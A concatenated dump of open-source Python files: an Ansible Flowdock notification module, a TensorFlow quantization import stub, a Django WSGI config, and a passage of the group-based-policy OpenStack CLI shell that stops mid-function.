| gpl-3.0 |
mzizzi/ansible | lib/ansible/modules/notification/flowdock.py | 16 | 6195 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2013 Matt Coddington <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: flowdock
version_added: "1.2"
author: "Matt Coddington (@mcodd)"
short_description: Send a message to a flowdock
description:
- Send a message to a flowdock team inbox or chat using the push API (see https://www.flowdock.com/api/team-inbox and https://www.flowdock.com/api/chat)
options:
token:
description:
- API token.
required: true
type:
description:
- Whether to post to 'inbox' or 'chat'
required: true
choices: [ "inbox", "chat" ]
msg:
description:
- Content of the message
required: true
tags:
description:
- tags of the message, separated by commas
required: false
external_user_name:
description:
- (chat only - required) Name of the "user" sending the message
required: false
from_address:
description:
- (inbox only - required) Email address of the message sender
required: false
source:
description:
- (inbox only - required) Human readable identifier of the application that uses the Flowdock API
required: false
subject:
description:
- (inbox only - required) Subject line of the message
required: false
from_name:
description:
- (inbox only) Name of the message sender
required: false
reply_to:
description:
- (inbox only) Email address for replies
required: false
project:
description:
- (inbox only) Human readable identifier for more detailed message categorization
required: false
link:
description:
- (inbox only) Link associated with the message. This will be used to link the message subject in Team Inbox.
required: false
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
version_added: 1.5.1
requirements: [ ]
'''
EXAMPLES = '''
- flowdock:
type: inbox
token: AAAAAA
from_address: [email protected]
source: my cool app
msg: test from ansible
subject: test subject
- flowdock:
type: chat
token: AAAAAA
external_user_name: testuser
msg: test from ansible
tags: tag1,tag2,tag3
'''
from ansible.module_utils.six.moves.urllib.parse import urlencode
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
token=dict(required=True, no_log=True),
msg=dict(required=True),
            type=dict(required=True, choices=["inbox", "chat"]),
external_user_name=dict(required=False),
from_address=dict(required=False),
source=dict(required=False),
subject=dict(required=False),
from_name=dict(required=False),
reply_to=dict(required=False),
project=dict(required=False),
tags=dict(required=False),
link=dict(required=False),
validate_certs = dict(default='yes', type='bool'),
),
supports_check_mode=True
)
type = module.params["type"]
token = module.params["token"]
if type == 'inbox':
url = "https://api.flowdock.com/v1/messages/team_inbox/%s" % (token)
else:
url = "https://api.flowdock.com/v1/messages/chat/%s" % (token)
params = {}
# required params
params['content'] = module.params["msg"]
# required params for the 'chat' type
if module.params['external_user_name']:
if type == 'inbox':
module.fail_json(msg="external_user_name is not valid for the 'inbox' type")
else:
params['external_user_name'] = module.params["external_user_name"]
elif type == 'chat':
module.fail_json(msg="external_user_name is required for the 'chat' type")
# required params for the 'inbox' type
    for item in ['from_address', 'source', 'subject']:
if module.params[item]:
if type == 'chat':
module.fail_json(msg="%s is not valid for the 'chat' type" % item)
else:
params[item] = module.params[item]
elif type == 'inbox':
module.fail_json(msg="%s is required for the 'inbox' type" % item)
# optional params
if module.params["tags"]:
params['tags'] = module.params["tags"]
# optional params for the 'inbox' type
    for item in ['from_name', 'reply_to', 'project', 'link']:
if module.params[item]:
if type == 'chat':
module.fail_json(msg="%s is not valid for the 'chat' type" % item)
else:
params[item] = module.params[item]
# If we're in check mode, just exit pretending like we succeeded
if module.check_mode:
module.exit_json(changed=False)
# Send the data to Flowdock
data = urlencode(params)
response, info = fetch_url(module, url, data=data)
if info['status'] != 200:
module.fail_json(msg="unable to send msg: %s" % info['msg'])
module.exit_json(changed=True, msg=module.params["msg"])
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| gpl-3.0 |
alsrgv/tensorflow | tensorflow/contrib/quantization/python/array_ops.py | 178 | 1156 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Quantized Array Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.ops import gen_array_ops as quantized_gen_array_ops
from tensorflow.python.ops.gen_array_ops import dequantize
from tensorflow.python.ops.gen_array_ops import quantize_v2
from tensorflow.python.ops.gen_array_ops import quantized_concat
# pylint: enable=unused-import
| apache-2.0 |
ddbeck/gittip-calculator | gittip_calculator/gittip_calculator/wsgi.py | 1 | 1452 | """
WSGI config for gittip_calculator project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "gittip_calculator.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gittip_calculator.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit |
tbachman/python-group-based-policy-client | gbpclient/gbpshell.py | 1 | 34075 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Command-line interface to the GBP APIs
"""
from __future__ import print_function
import argparse
import logging
import os
import sys
from keystoneclient.auth.identity import v2 as v2_auth
from keystoneclient.auth.identity import v3 as v3_auth
from keystoneclient import discover
from keystoneclient.openstack.common.apiclient import exceptions as ks_exc
from keystoneclient import session
from oslo.utils import encodeutils
import six.moves.urllib.parse as urlparse
from cliff import app
from cliff import commandmanager
from neutronclient.common import clientmanager
from neutronclient.common import exceptions as exc
from neutronclient.common import utils
from neutronclient.i18n import _
from neutronclient.version import __version__
from gbpclient.gbp.v2_0 import groupbasedpolicy as gbp
from gbpclient.gbp.v2_0 import servicechain
VERSION = '2.0'
NEUTRON_API_VERSION = '2.0'
clientmanager.neutron_client.API_VERSIONS = {
'2.0': 'gbpclient.v2_0.client.Client',
}
def run_command(cmd, cmd_parser, sub_argv):
_argv = sub_argv
index = -1
values_specs = []
if '--' in sub_argv:
index = sub_argv.index('--')
_argv = sub_argv[:index]
values_specs = sub_argv[index:]
known_args, _values_specs = cmd_parser.parse_known_args(_argv)
cmd.values_specs = (index == -1 and _values_specs or values_specs)
return cmd.run(known_args)
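# Illustrative note (added comment): run_command() splits argv on a literal
# '--'. For sub_argv = ['--name', 'foo', '--', '--key', 'value'], the slice
# ['--name', 'foo'] is parsed as known args, while everything from '--'
# onwards is passed through untouched as the command's values_specs.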
def env(*_vars, **kwargs):
"""Search for the first defined of possibly many env vars.
Returns the first environment variable defined in vars, or
returns the default defined in kwargs.
"""
for v in _vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
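# Illustrative usage (added comment): return the first defined variable, or
# the keyword default when none is set, e.g.
#   region = env('OS_REGION_NAME', 'NOVA_REGION', default='RegionOne')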
def check_non_negative_int(value):
try:
value = int(value)
except ValueError:
raise argparse.ArgumentTypeError(_("invalid int value: %r") % value)
if value < 0:
raise argparse.ArgumentTypeError(_("input value %d is negative") %
value)
return value
COMMAND_V2 = {
'policy-target-create': gbp.CreatePolicyTarget,
'policy-target-delete': gbp.DeletePolicyTarget,
'policy-target-update': gbp.UpdatePolicyTarget,
'policy-target-list': gbp.ListPolicyTarget,
'policy-target-show': gbp.ShowPolicyTarget,
'policy-target-group-create': gbp.CreatePolicyTargetGroup,
'policy-target-group-delete': gbp.DeletePolicyTargetGroup,
'policy-target-group-update': gbp.UpdatePolicyTargetGroup,
'policy-target-group-list': gbp.ListPolicyTargetGroup,
'policy-target-group-show': gbp.ShowPolicyTargetGroup,
'group-create': gbp.CreatePolicyTargetGroup,
'group-delete': gbp.DeletePolicyTargetGroup,
'group-update': gbp.UpdatePolicyTargetGroup,
'group-list': gbp.ListPolicyTargetGroup,
'group-show': gbp.ShowPolicyTargetGroup,
'l2policy-create': gbp.CreateL2Policy,
'l2policy-delete': gbp.DeleteL2Policy,
'l2policy-update': gbp.UpdateL2Policy,
'l2policy-list': gbp.ListL2Policy,
'l2policy-show': gbp.ShowL2Policy,
'l3policy-create': gbp.CreateL3Policy,
'l3policy-delete': gbp.DeleteL3Policy,
'l3policy-update': gbp.UpdateL3Policy,
'l3policy-list': gbp.ListL3Policy,
'l3policy-show': gbp.ShowL3Policy,
'network-service-policy-create': gbp.CreateNetworkServicePolicy,
'network-service-policy-delete': gbp.DeleteNetworkServicePolicy,
'network-service-policy-update': gbp.UpdateNetworkServicePolicy,
'network-service-policy-list': gbp.ListNetworkServicePolicy,
'network-service-policy-show': gbp.ShowNetworkServicePolicy,
'external-policy-create': gbp.CreateExternalPolicy,
'external-policy-delete': gbp.DeleteExternalPolicy,
'external-policy-update': gbp.UpdateExternalPolicy,
'external-policy-list': gbp.ListExternalPolicy,
'external-policy-show': gbp.ShowExternalPolicy,
'external-segment-create': gbp.CreateExternalSegment,
'external-segment-delete': gbp.DeleteExternalSegment,
'external-segment-update': gbp.UpdateExternalSegment,
'external-segment-list': gbp.ListExternalSegment,
'external-segment-show': gbp.ShowExternalSegment,
'nat-pool-create': gbp.CreateNatPool,
'nat-pool-delete': gbp.DeleteNatPool,
'nat-pool-update': gbp.UpdateNatPool,
'nat-pool-list': gbp.ListNatPool,
'nat-pool-show': gbp.ShowNatPool,
'policy-classifier-create': gbp.CreatePolicyClassifier,
'policy-classifier-delete': gbp.DeletePolicyClassifier,
'policy-classifier-update': gbp.UpdatePolicyClassifier,
'policy-classifier-list': gbp.ListPolicyClassifier,
'policy-classifier-show': gbp.ShowPolicyClassifier,
'policy-action-create': gbp.CreatePolicyAction,
'policy-action-delete': gbp.DeletePolicyAction,
'policy-action-update': gbp.UpdatePolicyAction,
'policy-action-list': gbp.ListPolicyAction,
'policy-action-show': gbp.ShowPolicyAction,
'policy-rule-create': gbp.CreatePolicyRule,
'policy-rule-delete': gbp.DeletePolicyRule,
'policy-rule-update': gbp.UpdatePolicyRule,
'policy-rule-list': gbp.ListPolicyRule,
'policy-rule-show': gbp.ShowPolicyRule,
'policy-rule-set-create': gbp.CreatePolicyRuleSet,
'policy-rule-set-delete': gbp.DeletePolicyRuleSet,
'policy-rule-set-update': gbp.UpdatePolicyRuleSet,
'policy-rule-set-list': gbp.ListPolicyRuleSet,
'policy-rule-set-show': gbp.ShowPolicyRuleSet,
'service-profile-list': servicechain.ListServiceProfile,
'service-profile-show': servicechain.ShowServiceProfile,
'service-profile-create': servicechain.CreateServiceProfile,
'service-profile-delete': servicechain.DeleteServiceProfile,
'service-profile-update': servicechain.UpdateServiceProfile,
'servicechain-node-list': servicechain.ListServiceChainNode,
'servicechain-node-show': servicechain.ShowServiceChainNode,
'servicechain-node-create': servicechain.CreateServiceChainNode,
'servicechain-node-delete': servicechain.DeleteServiceChainNode,
'servicechain-node-update': servicechain.UpdateServiceChainNode,
'servicechain-spec-list': servicechain.ListServiceChainSpec,
'servicechain-spec-show': servicechain.ShowServiceChainSpec,
'servicechain-spec-create': servicechain.CreateServiceChainSpec,
'servicechain-spec-delete': servicechain.DeleteServiceChainSpec,
'servicechain-spec-update': servicechain.UpdateServiceChainSpec,
'servicechain-instance-list': (
servicechain.ListServiceChainInstance
),
'servicechain-instance-show': (
servicechain.ShowServiceChainInstance
),
'servicechain-instance-create': (
servicechain.CreateServiceChainInstance
),
'servicechain-instance-delete': (
servicechain.DeleteServiceChainInstance
),
'servicechain-instance-update': (
servicechain.UpdateServiceChainInstance
),
}
COMMANDS = {'2.0': COMMAND_V2}
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
outputs = []
max_len = 0
app = self.default
parser.print_help(app.stdout)
app.api_version = '2.0' # Check this
app.stdout.write(_('\nCommands for GBP API v%s:\n') % app.api_version)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
factory = ep.load()
cmd = factory(self, None)
one_liner = cmd.get_description().split('\n')[0]
outputs.append((name, one_liner))
max_len = max(len(name), max_len)
for (name, one_liner) in outputs:
app.stdout.write(' %s %s\n' % (name.ljust(max_len), one_liner))
sys.exit(0)
class GBPShell(app.App):
# verbose logging levels
WARNING_LEVEL = 0
INFO_LEVEL = 1
DEBUG_LEVEL = 2
CONSOLE_MESSAGE_FORMAT = '%(message)s'
DEBUG_MESSAGE_FORMAT = '%(levelname)s: %(name)s %(message)s'
log = logging.getLogger(__name__)
def __init__(self, apiversion):
super(GBPShell, self).__init__(
description=__doc__.strip(),
version=VERSION,
command_manager=commandmanager.CommandManager('gbp.cli'), )
self.commands = COMMANDS
for k, v in self.commands[apiversion].items():
self.command_manager.add_command(k, v)
# This is instantiated in initialize_app() only when using
# password flow auth
self.auth_client = None
self.api_version = apiversion
def build_option_parser(self, description, version):
"""Return an argparse option parser for this application.
Subclasses may override this method to extend
the parser with more global options.
:param description: full description of the application
:paramtype description: str
:param version: version number for the application
:paramtype version: str
"""
parser = argparse.ArgumentParser(
description=description,
add_help=False, )
parser.add_argument(
'--version',
action='version',
version=__version__, )
parser.add_argument(
'-v', '--verbose', '--debug',
action='count',
dest='verbose_level',
default=self.DEFAULT_VERBOSE_LEVEL,
help=_('Increase verbosity of output and show tracebacks on'
' errors. You can repeat this option.'))
parser.add_argument(
'-q', '--quiet',
action='store_const',
dest='verbose_level',
const=0,
help=_('Suppress output except warnings and errors.'))
parser.add_argument(
'-h', '--help',
action=HelpAction,
nargs=0,
default=self, # tricky
help=_("Show this help message and exit."))
parser.add_argument(
'-r', '--retries',
metavar="NUM",
type=check_non_negative_int,
default=0,
help=_("How many times the request to the Neutron server should "
"be retried if it fails."))
# FIXME(bklei): this method should come from python-keystoneclient
self._append_global_identity_args(parser)
return parser
def _append_global_identity_args(self, parser):
# FIXME(bklei): these are global identity (Keystone) arguments which
# should be consistent and shared by all service clients. Therefore,
# they should be provided by python-keystoneclient. We will need to
# refactor this code once this functionality is available in
# python-keystoneclient.
#
# Note: At that time we'll need to decide if we can just abandon
# the deprecated args (--service-type and --endpoint-type).
parser.add_argument(
'--os-service-type', metavar='<os-service-type>',
default=env('OS_NETWORK_SERVICE_TYPE', default='network'),
help=_('Defaults to env[OS_NETWORK_SERVICE_TYPE] or network.'))
parser.add_argument(
'--os-endpoint-type', metavar='<os-endpoint-type>',
default=env('OS_ENDPOINT_TYPE', default='publicURL'),
help=_('Defaults to env[OS_ENDPOINT_TYPE] or publicURL.'))
# FIXME(bklei): --service-type is deprecated but kept in for
# backward compatibility.
parser.add_argument(
'--service-type', metavar='<service-type>',
default=env('OS_NETWORK_SERVICE_TYPE', default='network'),
help=_('DEPRECATED! Use --os-service-type.'))
# FIXME(bklei): --endpoint-type is deprecated but kept in for
# backward compatibility.
parser.add_argument(
'--endpoint-type', metavar='<endpoint-type>',
default=env('OS_ENDPOINT_TYPE', default='publicURL'),
help=_('DEPRECATED! Use --os-endpoint-type.'))
parser.add_argument(
'--os-auth-strategy', metavar='<auth-strategy>',
default=env('OS_AUTH_STRATEGY', default='keystone'),
help=_('DEPRECATED! Only keystone is supported.'))
parser.add_argument(
'--os_auth_strategy',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-auth-url', metavar='<auth-url>',
default=env('OS_AUTH_URL'),
help=_('Authentication URL, defaults to env[OS_AUTH_URL].'))
parser.add_argument(
'--os_auth_url',
help=argparse.SUPPRESS)
project_name_group = parser.add_mutually_exclusive_group()
project_name_group.add_argument(
'--os-tenant-name', metavar='<auth-tenant-name>',
default=env('OS_TENANT_NAME'),
help=_('Authentication tenant name, defaults to '
'env[OS_TENANT_NAME].'))
project_name_group.add_argument(
'--os-project-name',
metavar='<auth-project-name>',
default=utils.env('OS_PROJECT_NAME'),
            help='Another way to specify tenant name. '
                 'This option is mutually exclusive with '
                 '--os-tenant-name. '
                 'Defaults to env[OS_PROJECT_NAME].')
parser.add_argument(
'--os_tenant_name',
help=argparse.SUPPRESS)
project_id_group = parser.add_mutually_exclusive_group()
project_id_group.add_argument(
'--os-tenant-id', metavar='<auth-tenant-id>',
default=env('OS_TENANT_ID'),
help=_('Authentication tenant ID, defaults to '
'env[OS_TENANT_ID].'))
project_id_group.add_argument(
'--os-project-id',
metavar='<auth-project-id>',
default=utils.env('OS_PROJECT_ID'),
            help='Another way to specify tenant ID. '
                 'This option is mutually exclusive with '
                 '--os-tenant-id. '
                 'Defaults to env[OS_PROJECT_ID].')
parser.add_argument(
'--os-username', metavar='<auth-username>',
default=utils.env('OS_USERNAME'),
help=_('Authentication username, defaults to env[OS_USERNAME].'))
parser.add_argument(
'--os_username',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-id', metavar='<auth-user-id>',
default=env('OS_USER_ID'),
help=_('Authentication user ID (Env: OS_USER_ID)'))
parser.add_argument(
'--os_user_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-domain-id',
metavar='<auth-user-domain-id>',
default=utils.env('OS_USER_DOMAIN_ID'),
help='OpenStack user domain ID. '
'Defaults to env[OS_USER_DOMAIN_ID].')
parser.add_argument(
'--os_user_domain_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-domain-name',
metavar='<auth-user-domain-name>',
default=utils.env('OS_USER_DOMAIN_NAME'),
help='OpenStack user domain name. '
'Defaults to env[OS_USER_DOMAIN_NAME].')
parser.add_argument(
'--os_user_domain_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os_project_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os_project_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-project-domain-id',
metavar='<auth-project-domain-id>',
default=utils.env('OS_PROJECT_DOMAIN_ID'),
help='Defaults to env[OS_PROJECT_DOMAIN_ID].')
parser.add_argument(
'--os-project-domain-name',
metavar='<auth-project-domain-name>',
default=utils.env('OS_PROJECT_DOMAIN_NAME'),
help='Defaults to env[OS_PROJECT_DOMAIN_NAME].')
parser.add_argument(
'--os-cert',
metavar='<certificate>',
default=utils.env('OS_CERT'),
help=_("Path of certificate file to use in SSL "
"connection. This file can optionally be "
"prepended with the private key. Defaults "
"to env[OS_CERT]"))
parser.add_argument(
'--os-cacert',
metavar='<ca-certificate>',
default=env('OS_CACERT', default=None),
help=_("Specify a CA bundle file to use in "
"verifying a TLS (https) server certificate. "
"Defaults to env[OS_CACERT]"))
parser.add_argument(
'--os-key',
metavar='<key>',
default=utils.env('OS_KEY'),
help=_("Path of client key to use in SSL "
"connection. This option is not necessary "
"if your key is prepended to your certificate "
"file. Defaults to env[OS_KEY]"))
parser.add_argument(
'--os-password', metavar='<auth-password>',
default=utils.env('OS_PASSWORD'),
help=_('Authentication password, defaults to env[OS_PASSWORD].'))
parser.add_argument(
'--os_password',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-region-name', metavar='<auth-region-name>',
default=env('OS_REGION_NAME'),
help=_('Authentication region name, defaults to '
'env[OS_REGION_NAME].'))
parser.add_argument(
'--os_region_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-token', metavar='<token>',
default=env('OS_TOKEN'),
help=_('Authentication token, defaults to env[OS_TOKEN].'))
parser.add_argument(
'--os_token',
help=argparse.SUPPRESS)
parser.add_argument(
'--http-timeout', metavar='<seconds>',
default=env('OS_NETWORK_TIMEOUT', default=None), type=float,
help=_('Timeout in seconds to wait for an HTTP response. Defaults '
'to env[OS_NETWORK_TIMEOUT] or None if not specified.'))
parser.add_argument(
'--os-url', metavar='<url>',
default=env('OS_URL'),
help=_('Defaults to env[OS_URL].'))
parser.add_argument(
'--os_url',
help=argparse.SUPPRESS)
parser.add_argument(
'--insecure',
action='store_true',
default=env('NEUTRONCLIENT_INSECURE', default=False),
help=_("Explicitly allow neutronclient to perform \"insecure\" "
"SSL (https) requests. The server's certificate will "
"not be verified against any certificate authorities. "
"This option should be used with caution."))
def _bash_completion(self):
"""Prints all of the commands and options for bash-completion."""
commands = set()
options = set()
for option, _action in self.parser._option_string_actions.items():
options.add(option)
for command_name, command in self.command_manager:
commands.add(command_name)
cmd_factory = command.load()
cmd = cmd_factory(self, None)
cmd_parser = cmd.get_parser('')
for option, _action in cmd_parser._option_string_actions.items():
options.add(option)
print(' '.join(commands | options))
def run(self, argv):
"""Equivalent to the main program for the application.
:param argv: input arguments and options
:paramtype argv: list of str
"""
try:
index = 0
command_pos = -1
help_pos = -1
help_command_pos = -1
for arg in argv:
if arg == 'bash-completion':
self._bash_completion()
return 0
if arg in self.commands[self.api_version]:
if command_pos == -1:
command_pos = index
elif arg in ('-h', '--help'):
if help_pos == -1:
help_pos = index
elif arg == 'help':
if help_command_pos == -1:
help_command_pos = index
index = index + 1
if command_pos > -1 and help_pos > command_pos:
argv = ['help', argv[command_pos]]
if help_command_pos > -1 and command_pos == -1:
argv[help_command_pos] = '--help'
self.options, remainder = self.parser.parse_known_args(argv)
self.configure_logging()
self.interactive_mode = not remainder
self.initialize_app(remainder)
except Exception as err:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err))
raise
else:
self.log.error(unicode(err))
return 1
result = 1
if self.interactive_mode:
_argv = [sys.argv[0]]
sys.argv = _argv
result = self.interact()
else:
result = self.run_subcommand(remainder)
return result
def run_subcommand(self, argv):
subcommand = self.command_manager.find_command(argv)
cmd_factory, cmd_name, sub_argv = subcommand
cmd = cmd_factory(self, self.options)
err = None
result = 1
try:
self.prepare_to_run_command(cmd)
full_name = (cmd_name
if self.interactive_mode
else ' '.join([self.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
return run_command(cmd, cmd_parser, sub_argv)
except Exception as err:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err))
else:
self.log.error(unicode(err))
try:
self.clean_up(cmd, result, err)
except Exception as err2:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err2))
else:
self.log.error(_('Could not clean up: %s'), unicode(err2))
if self.options.verbose_level >= self.DEBUG_LEVEL:
raise
else:
try:
self.clean_up(cmd, result, None)
except Exception as err3:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err3))
else:
self.log.error(_('Could not clean up: %s'), unicode(err3))
return result
def authenticate_user(self):
"""Make sure the user has provided all of the authentication
info we need.
"""
if self.options.os_auth_strategy == 'keystone':
if self.options.os_token or self.options.os_url:
# Token flow auth takes priority
if not self.options.os_token:
raise exc.CommandError(
_("You must provide a token via"
" either --os-token or env[OS_TOKEN]"))
if not self.options.os_url:
raise exc.CommandError(
_("You must provide a service URL via"
" either --os-url or env[OS_URL]"))
else:
# Validate password flow auth
                project_info = (self.options.os_tenant_name or
                                self.options.os_tenant_id or
                                (self.options.os_project_name and
                                 (self.options.os_project_domain_name or
                                  self.options.os_project_domain_id)) or
                                self.options.os_project_id)
if (not self.options.os_username
and not self.options.os_user_id):
raise exc.CommandError(
_("You must provide a username or user ID via"
" --os-username, env[OS_USERNAME] or"
" --os-user_id, env[OS_USER_ID]"))
if not self.options.os_password:
raise exc.CommandError(
_("You must provide a password via"
" either --os-password or env[OS_PASSWORD]"))
                if not project_info:
# tenent is deprecated in Keystone v3. Use the latest
# terminology instead.
raise exc.CommandError(
_("You must provide a project_id or project_name ("
"with project_domain_name or project_domain_id) "
"via "
" --os-project-id (env[OS_PROJECT_ID])"
" --os-project-name (env[OS_PROJECT_NAME]),"
" --os-project-domain-id "
"(env[OS_PROJECT_DOMAIN_ID])"
" --os-project-domain-name "
"(env[OS_PROJECT_DOMAIN_NAME])"))
if not self.options.os_auth_url:
raise exc.CommandError(
_("You must provide an auth url via"
" either --os-auth-url or via env[OS_AUTH_URL]"))
else: # not keystone
if not self.options.os_url:
raise exc.CommandError(
_("You must provide a service URL via"
" either --os-url or env[OS_URL]"))
auth_session = self._get_keystone_session()
self.client_manager = clientmanager.ClientManager(
token=self.options.os_token,
url=self.options.os_url,
auth_url=self.options.os_auth_url,
tenant_name=self.options.os_tenant_name,
tenant_id=self.options.os_tenant_id,
username=self.options.os_username,
user_id=self.options.os_user_id,
password=self.options.os_password,
region_name=self.options.os_region_name,
api_version=self.api_version,
auth_strategy=self.options.os_auth_strategy,
# FIXME (bklei) honor deprecated service_type and
# endpoint type until they are removed
service_type=self.options.os_service_type or
self.options.service_type,
            endpoint_type=self.options.os_endpoint_type or self.options.endpoint_type,
insecure=self.options.insecure,
ca_cert=self.options.os_cacert,
timeout=self.options.http_timeout,
retries=self.options.retries,
raise_errors=False,
session=auth_session,
auth=auth_session.auth,
log_credentials=True)
return
def initialize_app(self, argv):
"""Global app init bits:
* set up API versions
* validate authentication info
"""
super(GBPShell, self).initialize_app(argv)
self.api_version = {'network': self.api_version}
# If the user is not asking for help, make sure they
# have given us auth.
cmd_name = None
if argv:
cmd_info = self.command_manager.find_command(argv)
cmd_factory, cmd_name, sub_argv = cmd_info
if self.interactive_mode or cmd_name != 'help':
self.authenticate_user()
def clean_up(self, cmd, result, err):
self.log.debug('clean_up %s', cmd.__class__.__name__)
if err:
self.log.debug('Got an error: %s', unicode(err))
def configure_logging(self):
"""Create logging handlers for any log output."""
root_logger = logging.getLogger('')
# Set up logging to a file
root_logger.setLevel(logging.DEBUG)
# Send higher-level messages to the console via stderr
console = logging.StreamHandler(self.stderr)
console_level = {self.WARNING_LEVEL: logging.WARNING,
self.INFO_LEVEL: logging.INFO,
self.DEBUG_LEVEL: logging.DEBUG,
}.get(self.options.verbose_level, logging.DEBUG)
console.setLevel(console_level)
if logging.DEBUG == console_level:
formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)
else:
formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
console.setFormatter(formatter)
root_logger.addHandler(console)
return
def get_v2_auth(self, v2_auth_url):
return v2_auth.Password(
v2_auth_url,
username=self.options.os_username,
password=self.options.os_password,
tenant_id=self.options.os_tenant_id,
tenant_name=self.options.os_tenant_name)
def get_v3_auth(self, v3_auth_url):
project_id = self.options.os_project_id or self.options.os_tenant_id
project_name = (self.options.os_project_name or
self.options.os_tenant_name)
return v3_auth.Password(
v3_auth_url,
username=self.options.os_username,
password=self.options.os_password,
user_id=self.options.os_user_id,
user_domain_name=self.options.os_user_domain_name,
user_domain_id=self.options.os_user_domain_id,
project_id=project_id,
project_name=project_name,
project_domain_name=self.options.os_project_domain_name,
project_domain_id=self.options.os_project_domain_id
)
def _discover_auth_versions(self, session, auth_url):
# discover the API versions the server is supporting base on the
# given URL
try:
ks_discover = discover.Discover(session=session, auth_url=auth_url)
return (ks_discover.url_for('2.0'), ks_discover.url_for('3.0'))
except ks_exc.ClientException:
# Identity service may not support discover API version.
# Lets try to figure out the API version from the original URL.
url_parts = urlparse.urlparse(auth_url)
(scheme, netloc, path, params, query, fragment) = url_parts
path = path.lower()
if path.startswith('/v3'):
return (None, auth_url)
elif path.startswith('/v2'):
return (auth_url, None)
else:
# not enough information to determine the auth version
msg = _('Unable to determine the Keystone version '
'to authenticate with using the given '
'auth_url. Identity service may not support API '
'version discovery. Please provide a versioned '
'auth_url instead.')
raise exc.CommandError(msg)
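    # Illustrative fallback (added comment): when discovery is unsupported,
    # the version is inferred from the URL path, e.g.
    #   http://keystone:5000/v2.0  ->  (auth_url, None)
    #   http://keystone:5000/v3    ->  (None, auth_url)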
def _get_keystone_session(self):
# first create a Keystone session
cacert = self.options.os_cacert or None
cert = self.options.os_cert or None
key = self.options.os_key or None
insecure = self.options.insecure or False
ks_session = session.Session.construct(dict(cacert=cacert,
cert=cert,
key=key,
insecure=insecure))
# discover the supported keystone versions using the given url
(v2_auth_url, v3_auth_url) = self._discover_auth_versions(
session=ks_session,
auth_url=self.options.os_auth_url)
# Determine which authentication plugin to use. First inspect the
# auth_url to see the supported version. If both v3 and v2 are
# supported, then use the highest version if possible.
user_domain_name = self.options.os_user_domain_name or None
user_domain_id = self.options.os_user_domain_id or None
project_domain_name = self.options.os_project_domain_name or None
project_domain_id = self.options.os_project_domain_id or None
domain_info = (user_domain_name or user_domain_id or
project_domain_name or project_domain_id)
if (v2_auth_url and not domain_info) or not v3_auth_url:
ks_session.auth = self.get_v2_auth(v2_auth_url)
else:
